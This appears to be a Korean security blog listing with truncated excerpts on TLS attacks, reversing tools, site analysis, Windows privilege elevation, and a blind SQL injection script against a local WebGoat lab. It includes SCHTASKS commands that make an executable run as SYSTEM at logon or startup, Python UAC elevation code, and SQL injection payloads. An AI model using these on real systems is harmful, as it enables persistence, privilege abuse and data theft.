🤖정보보안/❤️레드팀

HTTPS/TLS 프로토콜은 인터넷 상에서 데이터를 보호하기 위해 사용되는 가장 보편적인 보안 프로토콜입니다. 하지만 HTTPS/TLS 프로토콜도 여러 가지 공격에 취약합니다. 다음은 HTTPS/TLS 프로토콜에서 발생하는 일부 주요 공격에 대한 설명입니다. 중간자 공격 (Man-in-the-middle attack): 중간자 공격은 해커가 통신 중인 두 개체 간에 중간자 역할을 수행하여 통신 내용을 도청, 변경, 위조하는 공격입니다. 이 공격을 방지하기 위해, HTTPS/TLS 프로토콜에서는 인증서를 사용하여 통신 상대방의 신원을 검증합니다. 하지만 인증서의 신뢰성이 보장되지 않으면 중간자 공격에 취약할 수 있습니다. SSL Strip: SSL Strip은 HTTPS 대신 HTTP를 사용하는 공격입니다..

리버싱을 하기 위해서는 다양한 도구들이 있습니다. 이 중에서 가장 일반적으로 사용되는 도구들은 다음과 같습니다: 디버거 (Debugger): 디버거는 프로그램의 실행 중에 코드의 동작을 조사하고 오류를 해결하기 위해 사용됩니다. 대부분의 프로그래밍 언어와 플랫폼은 내장된 디버거를 제공하며, 제3의 디버거 도구도 많이 있습니다. 디컴파일러 (Decompiler): 디컴파일러는 컴파일된 프로그램을 역으로 변환하여 소스 코드를 생성합니다. 이를 통해 리버싱을 수행할 수 있습니다. 언패커 (Unpacker): 언패커는 패킹된 프로그램을 해제하고 원래의 실행 파일을 추출합니다. 패킹된 프로그램은 프로그램 코드를 암호화하거나, 복호화하기 위한 인증 절차를 수행하기 때문에 리버싱을 어렵게 만들기 때문에 언패킹을 먼저..

사이트 분석이란, 웹사이트의 구조, 콘텐츠, 링크 구조, 검색 엔진 최적화 상태 등을 분석하는 것을 의미합니다. 사이트 분석을 수행하는 방법에는 여러 가지가 있습니다. 일부는 수동으로 진행하며, 다른 일부는 자동화 도구를 사용하여 수행할 수 있습니다. 수동으로 사이트를 분석하는 방법은 웹사이트에 직접 접속하여 분석하거나, 웹사이트의 소스 코드를 직접 분석하는 것입니다. 이를 통해 웹사이트의 사용자 경험, 성능, 보안, 검색 엔진 최적화 상태 등을 평가할 수 있습니다. 반면에 자동화 도구를 사용하면 크롤링, 스크래핑, SEO 분석 등을 자동으로 수행할 수 있습니다. 대표적인 사이트 분석 도구로는 Google Analytics, SEMrush, Ahrefs, Moz 등이 있습니다. 이러한 도구를 사용하여 웹..

해당 파이썬 함수로 아래와 같이 최고 권한의 프로그램 실행을 할 수 있다. os.system(f'SCHTASKS /Create /TN {SVC_NAME} /SC ONLOGON /TR {SVC_PROG_PATH} /RL HIGHEST') 또는 일반 명령어로 SCHTASKS /Create /TN "Go" /SC ONSTART /TR "C:\Users\AidenLee\Downloads\go.exe" /RL HIGHEST /RU "SYSTEM" 응용 os.system()을 사용하여 Windows에서 권한 상승을 요청하는 방법 중 하나는 작업 스케줄러(Task Scheduler)를 사용하는 것입니다. 이미 사용하고 계신 SCHTASKS 명령은 이 방법 중 하나입니다. 아래는 다른 몇 가지 방법을 제공합니다. ru..

온라인에서 발견되는 기존 파이썬 권한 상승 요청 코드의 경우 패키지 이름이 win32com에서 shell을 요청하지만 2022년 기준 win32comext에 존재한다. import os import sys # win32com.shell이 아닌 win32comext 이다 from win32comext.shell import shell ASADMIN = 'asadmin' print(sys.argv) if sys.argv[-1] != ASADMIN: script = os.path.abspath(sys.argv[0]) params = ' '.join([script] + sys.argv[1:] + [ASADMIN]) shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.execut..

import requests password = str() cre = "created" url = "http://localhost:8080/WebGoat/SqlInjection/challenge" cookie = {'JSESSIONID':'8B10E84050C998DD12174E500DBA38F6'} print ('[*] Get password length...') password_length = int() for length in range(1,30): datas = {'username_reg' : "tom' and length(password) = %d and '1'='1" % length, 'email_reg' : 'test@test.com', 'password_reg' : '1111', 'conf..